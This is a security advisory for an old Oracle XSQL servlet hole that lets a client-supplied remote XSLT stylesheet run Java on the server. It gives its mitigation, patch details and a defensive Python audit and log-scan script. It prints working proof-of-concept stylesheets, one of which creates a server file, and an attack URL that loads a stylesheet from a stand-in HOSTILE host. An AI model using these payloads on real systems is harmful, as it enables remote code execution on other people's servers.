COMMAND

    Oracle

SYSTEMS AFFECTED

    Oracle 8.1.7 (others?)

PROBLEM

    The following is based on Georgi Guninski security advisory #34.
    The Oracle XSQL servlet and its xml-stylesheet parameter allow
    executing Java on the web server.

    This affects the Oracle XSQL servlet, installed by default with the
    Oracle 8.1.7 Windows 2000 installation; other versions/platforms are
    probably affected as well, because the servlet is written in Java.

    For an overview of the XSQL servlet, read:

        http://technet.oracle.com/tech/xml/xsql_servlet/htdocs/relnotes.htm

    The XSQL servlet allows specifying external XSLT stylesheets, which
    may reside anywhere.  The problem is that the XSLT stylesheet can
    execute Java on the web server.  Executing Java on the web server
    may lead to compromising it.

    Oracle allows extending the built-in XSLT functions through the
    namespace "http://www.oracle.com/XSL/Transform/java/".  Using this
    namespace it is possible to instantiate Java objects and execute
    their methods.

    Sample xslt stylesheets:

    --ora.xsl---string function, almost no effect---------------
    <?xml version="1.0"?>
    <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.lang.String" version="1.0">
    <xsl:template match="/">
    <html>
    <h2>
    Written by <A HREF="http://www.guninski.com">Georgi Guninski</A>
    <BR>
    </BR>
    Java demo.
    <xsl:variable name="str1" select="jstr:new('java on the server')" />
    <xsl:value-of select="jstr:toUpperCase($str1)" />
    </h2>
    </html>
    </xsl:template>
    </xsl:stylesheet>

    --ora2.xsl----creates a file -------------------------------
    <?xml version="1.0"?>
    <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.io.File" version="1.0">
    <xsl:template match="/">
    <html>
    <h2>
    Written by <A HREF="http://www.guninski.com">Georgi Guninski</A>
    <BR>
    </BR>
    File "c:\winnt\georgigjava" created=
    <xsl:variable name="r1" select="jstr:new('c:\\winnt\\georgigjava')" />
    <xsl:value-of select="jstr:createNewFile($r1)" />
    </h2>
    </html>
    </xsl:template>
    </xsl:stylesheet>

    Assuming  that  http://XSQL-SERVER/EXISTING.xsql  exists  and   is
    configured (there are installed .xsql demos in  /xsql/java/demo/),
    the following URL:

        http://XSQL-SERVER/EXISTING.xsql?xml-stylesheet=http://HOSTILE/ora.xsl

    will  execute  java   from  http://HOSTILE/ora.xsl  (see   example
    stylesheets above) on XSQL-SERVER.

    This works on a default Oracle 8.1.7 install; we only needed to
    adjust the database name in the servlet config file.

SOLUTION

    Add  'allow-client-style="no"'  on  the  document element of every
    xsql page.
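    The following is an added example (not part of the original advisory
    or of Oracle's code) showing two defender-side checks for the issue
    above: an audit of an .xsql page's document element for the
    allow-client-style="no" mitigation, and a scan of web server access
    log lines for requests that pass an absolute URL in xml-stylesheet,
    as in the URL shown in the PROBLEM section.  The .xsql pages and log
    lines are constructed samples; the urn:oracle-xsql namespace is the
    one XSQL pages use, and the common-log line layout is assumed.

```python
"""Defensive checks for the XSQL xml-stylesheet issue (added example)."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qs


def audit_xsql_page(xsql_text: str) -> bool:
    """True only if the document (root) element explicitly carries
    allow-client-style="no"; a missing or different value counts as exposed."""
    root = ET.fromstring(xsql_text)
    return root.get("allow-client-style", "").strip().lower() == "no"


# Request-line part of a common-log entry: '"GET /path?query HTTP/1.0"'.
_REQ = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def remote_stylesheet_requests(log_lines):
    """Return (requested_path, stylesheet_url) for each request whose
    xml-stylesheet parameter is an absolute http(s) URL, i.e. a stylesheet
    fetched from a host chosen by the client rather than one on the server."""
    hits = []
    for line in log_lines:
        m = _REQ.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        for value in parse_qs(parts.query).get("xml-stylesheet", []):
            if urlsplit(value).scheme in ("http", "https"):
                hits.append((parts.path, value))
    return hits


# Constructed sample pages: one without the mitigation, one with it.
EXPOSED_PAGE = ('<?xml version="1.0"?>\n<page connection="demo" xmlns:xsql="urn:oracle-xsql">\n'
                '  <xsql:query>select sysdate from dual</xsql:query>\n</page>')
HARDENED_PAGE = ('<?xml version="1.0"?>\n<page connection="demo" allow-client-style="no" '
                 'xmlns:xsql="urn:oracle-xsql">\n'
                 '  <xsql:query>select sysdate from dual</xsql:query>\n</page>')

# Constructed access-log lines; only the second one names a remote stylesheet.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2001:10:00:00 +0000] "GET /xsql/demo/emp.xsql HTTP/1.0" 200 812',
    '10.0.0.9 - - [01/Jan/2001:10:00:07 +0000] "GET /xsql/demo/emp.xsql?xml-stylesheet=http://HOSTILE/ora.xsl HTTP/1.0" 200 455',
    '10.0.0.9 - - [01/Jan/2001:10:00:09 +0000] "GET /xsql/demo/emp.xsql?xml-stylesheet=emp.xsl HTTP/1.0" 200 455',
]

if __name__ == "__main__":
    print("exposed page mitigated?", audit_xsql_page(EXPOSED_PAGE))    # False
    print("hardened page mitigated?", audit_xsql_page(HARDENED_PAGE))  # True
    for path, url in remote_stylesheet_requests(SAMPLE_LOG):
        print("client-supplied remote stylesheet:", path, "->", url)
```

    Run the audit over every .xsql file under the servlet's document
    root; a page for which audit_xsql_page returns False still accepts a
    client-chosen stylesheet.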

    Oracle has corrected this vulnerability in the new release of XSQL
    Servlet as well as provided more secure behavior by default.   The
    new release of XSQL Servlet, Release 1.0.4.0, can be obtained from
    Oracle Technology Network, OTN,

        http://otn.oracle.com/tech/xml/xsql_servlet

    A patch will also be  available in the upcoming Oracle8i,  Release
    8.1.7.1, patch set and available for use with iAS Release 1.0.2.1.